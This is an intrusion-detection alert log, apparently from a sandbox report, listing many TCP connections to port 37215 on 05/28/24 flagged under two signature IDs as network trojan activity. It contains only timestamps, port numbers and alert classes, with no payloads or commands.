            Timestamp:05/28/24-09:55:47.532744
            SID:2829579
            Source Port:59884
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.911326
            SID:2829579
            Source Port:54338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.542032
            SID:2835222
            Source Port:41662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.899719
            SID:2829579
            Source Port:47972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.060949
            SID:2829579
            Source Port:50868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.043220
            SID:2835222
            Source Port:58528
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.887374
            SID:2829579
            Source Port:45554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.657318
            SID:2829579
            Source Port:35834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.640543
            SID:2829579
            Source Port:58564
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.745049
            SID:2835222
            Source Port:46902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.924558
            SID:2835222
            Source Port:34246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.778351
            SID:2835222
            Source Port:39976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.955996
            SID:2835222
            Source Port:53422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.856324
            SID:2835222
            Source Port:52008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.870359
            SID:2835222
            Source Port:52794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936002
            SID:2835222
            Source Port:49910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.794181
            SID:2829579
            Source Port:34480
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.060979
            SID:2835222
            Source Port:54986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.075347
            SID:2835222
            Source Port:59606
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.877612
            SID:2829579
            Source Port:36298
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.063657
            SID:2835222
            Source Port:42984
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.909167
            SID:2829579
            Source Port:38852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857190
            SID:2835222
            Source Port:59898
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.557283
            SID:2835222
            Source Port:41034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.778415
            SID:2835222
            Source Port:60210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321404
            SID:2829579
            Source Port:42510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857527
            SID:2829579
            Source Port:49092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.459727
            SID:2835222
            Source Port:53718
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.342070
            SID:2835222
            Source Port:35910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777433
            SID:2829579
            Source Port:40818
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956441
            SID:2835222
            Source Port:36034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.436973
            SID:2835222
            Source Port:60166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.876351
            SID:2829579
            Source Port:48296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863585
            SID:2829579
            Source Port:47222
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.864245
            SID:2835222
            Source Port:47446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061413
            SID:2829579
            Source Port:56992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.057798
            SID:2829579
            Source Port:47418
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.896769
            SID:2835222
            Source Port:39228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:41.543396
            SID:2829579
            Source Port:43606
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.680089
            SID:2835222
            Source Port:60280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:41.542671
            SID:2835222
            Source Port:34356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.909292
            SID:2829579
            Source Port:40620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.437098
            SID:2829579
            Source Port:59468
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.821509
            SID:2829579
            Source Port:33562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.828771
            SID:2835222
            Source Port:36520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857045
            SID:2835222
            Source Port:55064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:19.875315
            SID:2835222
            Source Port:44532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.034876
            SID:2829579
            Source Port:41886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.773068
            SID:2829579
            Source Port:58566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.558019
            SID:2835222
            Source Port:59608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809317
            SID:2829579
            Source Port:56388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.533529
            SID:2835222
            Source Port:35116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:04.899655
            SID:2829579
            Source Port:43676
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862915
            SID:2829579
            Source Port:37142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.378511
            SID:2835222
            Source Port:45638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.485830
            SID:2829579
            Source Port:43206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.925325
            SID:2835222
            Source Port:41316
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848313
            SID:2829579
            Source Port:44092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.821400
            SID:2835222
            Source Port:46114
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.843101
            SID:2829579
            Source Port:59216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.928825
            SID:2835222
            Source Port:42042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.596943
            SID:2829579
            Source Port:45872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.301020
            SID:2829579
            Source Port:53142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.704733
            SID:2829579
            Source Port:34712
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.926196
            SID:2835222
            Source Port:40326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.605381
            SID:2829579
            Source Port:45956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.809963
            SID:2835222
            Source Port:52694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.357221
            SID:2829579
            Source Port:41720
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.850322
            SID:2835222
            Source Port:37096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.917684
            SID:2835222
            Source Port:45740
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.074959
            SID:2835222
            Source Port:43136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.759663
            SID:2829579
            Source Port:46804
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.394173
            SID:2835222
            Source Port:51576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.899826
            SID:2835222
            Source Port:36230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.540213
            SID:2835222
            Source Port:34808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.855654
            SID:2829579
            Source Port:34668
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:48.626377
            SID:2829579
            Source Port:37472
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.382989
            SID:2835222
            Source Port:35252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.604310
            SID:2829579
            Source Port:56544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.342951
            SID:2829579
            Source Port:36242
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.941657
            SID:2829579
            Source Port:58596
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.767321
            SID:2829579
            Source Port:35634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.806908
            SID:2835222
            Source Port:39424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.955708
            SID:2835222
            Source Port:59654
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.433205
            SID:2835222
            Source Port:57850
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.735228
            SID:2829579
            Source Port:60750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.802221
            SID:2835222
            Source Port:59424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.917340
            SID:2829579
            Source Port:35496
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.043107
            SID:2835222
            Source Port:55780
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.646359
            SID:2835222
            Source Port:39756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.966617
            SID:2835222
            Source Port:50164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.750508
            SID:2835222
            Source Port:35078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.853923
            SID:2835222
            Source Port:59704
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:04.899396
            SID:2829579
            Source Port:48554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.919628
            SID:2829579
            Source Port:51968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.993978
            SID:2835222
            Source Port:43324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.005273
            SID:2829579
            Source Port:48930
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.927243
            SID:2829579
            Source Port:47970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.596800
            SID:2829579
            Source Port:39944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.062911
            SID:2829579
            Source Port:59002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543280
            SID:2835222
            Source Port:53154
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.759535
            SID:2835222
            Source Port:48040
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.821810
            SID:2829579
            Source Port:40240
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.879443
            SID:2829579
            Source Port:43162
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.028193
            SID:2835222
            Source Port:41136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753380
            SID:2835222
            Source Port:57042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.459644
            SID:2829579
            Source Port:51974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.639521
            SID:2835222
            Source Port:44774
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.745089
            SID:2835222
            Source Port:55444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058263
            SID:2835222
            Source Port:36732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848213
            SID:2829579
            Source Port:46568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.806863
            SID:2835222
            Source Port:45942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.388714
            SID:2835222
            Source Port:33812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.067260
            SID:2829579
            Source Port:39038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.519058
            SID:2835222
            Source Port:60684
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.904247
            SID:2835222
            Source Port:40282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.733463
            SID:2835222
            Source Port:36858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.005116
            SID:2835222
            Source Port:59044
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.313186
            SID:2829579
            Source Port:50294
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.279761
            SID:2835222
            Source Port:47296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.483013
            SID:2829579
            Source Port:36844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756793
            SID:2835222
            Source Port:37776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.744736
            SID:2835222
            Source Port:54832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.070085
            SID:2835222
            Source Port:37114
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046835
            SID:2835222
            Source Port:57018
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.738669
            SID:2835222
            Source Port:58736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.782327
            SID:2835222
            Source Port:49772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:38.473864
            SID:2835222
            Source Port:38502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.870877
            SID:2835222
            Source Port:43430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.963784
            SID:2835222
            Source Port:54090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.003103
            SID:2829579
            Source Port:37908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.040987
            SID:2835222
            Source Port:56682
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.894041
            SID:2835222
            Source Port:44038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.390933
            SID:2835222
            Source Port:57152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.628139
            SID:2835222
            Source Port:48064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.828997
            SID:2829579
            Source Port:47542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.605605
            SID:2835222
            Source Port:42726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.073024
            SID:2829579
            Source Port:46322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.849788
            SID:2829579
            Source Port:60088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.952787
            SID:2829579
            Source Port:54884
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.974954
            SID:2829579
            Source Port:60904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935985
            SID:2829579
            Source Port:35326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841511
            SID:2829579
            Source Port:43028
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.951717
            SID:2835222
            Source Port:35868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936905
            SID:2829579
            Source Port:49528
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.526052
            SID:2829579
            Source Port:51084
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.817654
            SID:2829579
            Source Port:52054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.326699
            SID:2835222
            Source Port:57730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.957529
            SID:2835222
            Source Port:56604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.847425
            SID:2835222
            Source Port:52570
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.057418
            SID:2829579
            Source Port:48594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735711
            SID:2835222
            Source Port:48466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.943085
            SID:2835222
            Source Port:54980
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.927272
            SID:2829579
            Source Port:51170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.759943
            SID:2835222
            Source Port:46232
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:47.601690
            SID:2829579
            Source Port:45196
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919526
            SID:2835222
            Source Port:51180
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.707512
            SID:2829579
            Source Port:45336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804435
            SID:2835222
            Source Port:43022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.014755
            SID:2829579
            Source Port:37456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873224
            SID:2835222
            Source Port:54768
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930345
            SID:2835222
            Source Port:42866
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.766800
            SID:2829579
            Source Port:59602
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280040
            SID:2835222
            Source Port:33946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.348961
            SID:2829579
            Source Port:53416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954624
            SID:2829579
            Source Port:48178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.985684
            SID:2835222
            Source Port:36828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776929
            SID:2829579
            Source Port:56268
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.918913
            SID:2835222
            Source Port:57798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842179
            SID:2829579
            Source Port:50806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.052565
            SID:2829579
            Source Port:37446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.804656
            SID:2829579
            Source Port:41658
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:07.000392
            SID:2829579
            Source Port:37586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.849039
            SID:2829579
            Source Port:51686
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.260719
            SID:2835222
            Source Port:49304
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.663940
            SID:2829579
            Source Port:41176
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777003
            SID:2829579
            Source Port:57436
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.809183
            SID:2829579
            Source Port:40638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.782691
            SID:2829579
            Source Port:55110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.252203
            SID:2835222
            Source Port:55898
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.655255
            SID:2829579
            Source Port:55070
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.790011
            SID:2829579
            Source Port:55952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.180514
            SID:2835222
            Source Port:57160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.392533
            SID:2835222
            Source Port:54400
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.059764
            SID:2835222
            Source Port:43642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.812685
            SID:2829579
            Source Port:35748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857760
            SID:2835222
            Source Port:60748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.811768
            SID:2835222
            Source Port:50188
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.342630
            SID:2829579
            Source Port:33780
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.744389
            SID:2829579
            Source Port:37886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.444666
            SID:2829579
            Source Port:36282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.494536
            SID:2835222
            Source Port:45222
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.778153
            SID:2835222
            Source Port:59408
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.742258
            SID:2829579
            Source Port:47320
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.896244
            SID:2829579
            Source Port:46018
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.905680
            SID:2835222
            Source Port:37270
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.861793
            SID:2835222
            Source Port:39808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.888972
